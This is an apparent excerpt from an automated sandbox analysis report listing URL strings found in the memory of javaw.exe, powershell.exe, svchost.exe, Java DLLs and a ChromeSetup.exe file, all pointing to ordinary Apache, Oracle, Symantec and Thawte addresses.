Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizetp://a
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor7
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner7
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler=
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter8
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesxc
Source: javaw.exe, 00000002.00000002.3385302759.0000000009FDB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miZT
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000007.00000002.2860702019.000001C7D6C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000002.00000002.3385302759.0000000009FE0000.00000004.00001000.00020000.00000000.sdmp, java.dll.0.dr	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource;
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/)
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: fxplugins.dll.0.dr	String found in binary or memory: http://javafx.com/
Source: fxplugins.dll.0.dr	String found in binary or memory: http://javafx.com/vp6decoderflvdemux
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTDR
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet8
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature#
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature-
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature6
Source: ChromeSetup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: javaw.exe, 00000002.00000002.3385302759.000000000A83D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000002.00000003.1078463404.0000000015805000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlL
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/C:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo%
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
